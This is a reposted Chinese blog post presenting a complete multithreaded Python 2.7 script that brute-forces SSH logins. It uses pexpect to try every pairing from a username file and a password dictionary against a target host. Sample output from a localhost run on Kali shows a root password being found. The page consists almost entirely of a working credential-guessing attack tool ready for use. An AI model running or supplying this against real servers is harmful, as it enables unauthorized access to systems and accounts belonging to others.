利用python暴力破解ssh

本文轉載自查看原文 2016-08-14 09:20 3652 python安全工具/ ssh/ pexpect

 1 # -*- coding:utf-8 -*-
 2 #python 2.7
 3 
 4 import optparse,sys,threading
 5 import pexpect
 6 
 7 PROMPT = ['#','>','/$']
 8 def ssh(host,user,password):
 9     child = pexpect.spawn('ssh %s@%s' % (user,host))
10     ret = child.expect(['(?i)are you sure.*','(?i)password:',pexpect.TIMEOUT,pexpect.EOF])
11     #print child.before
12     if ret == 0:
13         child.sendline('yes')
14         child.expect('[pP]ssword:')
15         child.sendline(password)
16         try:
17             ret0 = child.expect(PROMPT)
18             if ret0 in (0,1,2):
19                 #print child.before
20                 print '[+] 已經連接0'
21                 print '<*>用戶是：' + user
22                 print '<*>密碼是：' + password
23                 #return child
24         except:
25             print '[-]連接失敗0,密碼錯誤！'
26     elif ret == 1:
27         child.sendline(password)
28         try:
29             ret1 = child.expect(PROMPT)
30             print child.before
31             if ret1 in (0,1,2):
32                 #print child.before
33                 print '[+] 已經連接1'
34                 print '<*>用戶是：' + user
35                 print '<*>密碼是：' + password
36                 #return child
37         except:
38             print '[-]連接失敗1，用戶或密碼錯誤！'
39     else:
40         print '[-] 連接失敗2'
41 
42 def main():
43     usage = 'Usage:%prog <-H host> <-U user.txt> <-D dictionary.txt>'
44     parser = optparse.OptionParser(usage,version='%prog v1.0')
45     parser.add_option('-H',dest='target_host',type='string',
46                       help='目標主機')
47     parser.add_option('-U',dest='user',type='string',
48                       help='ssh用戶')
49     parser.add_option('-D',dest='dictionary',type='string',
50                       help='密碼字典')
51     (options,args) = parser.parse_args()
52     if  (not options.target_host) | (not options.user) | (not options.dictionary):
53         print parser.usage
54         exit(0)
55     else:
56         target_host = options.target_host
57         users = options.user
58         passwords = options.dictionary
59     users = open(users)
60     passwords = open(passwords)
61     #i = 0
62     for user in users:
63         user = user.strip('\r\n')
64         #print user + str(i)
65         #i = i + 1
66         passwords.seek(0)#回到密碼文件行首
67         for password in passwords:
68             password = password.strip('\r\n')
69             #print user
70             t = threading.Thread(target=ssh,args=(target_host,user,password))
71             t.start()
72 
73 if __name__ == '__main__':
74     main()

測試運行結果為：

python Sshconector.py  -H 127.0.0.1 -U user.txt -D password.txt
 
Linux HOSTKALI 3.18.0-kali1-amd64 
[+] 已經連接1
<*>用戶是：root
<*>密碼是：xxxxxxx
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！
[-]連接失敗1，用戶或密碼錯誤！

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 利用kali通過ssh暴力破解Linux的系統弱密碼防止SSH暴力破解 Metasploit通過ssh暴力破解 Linux 利用hosts.deny 防止暴力破解ssh 利用nmap暴力破解利用Python自動生成暴力破解的字典 Linux CentOS 防止SSH暴力破解 Kali 暴力破解ssh密碼 SSH私鑰登錄，防止暴力破解基於hydra的ssh密碼的暴力破解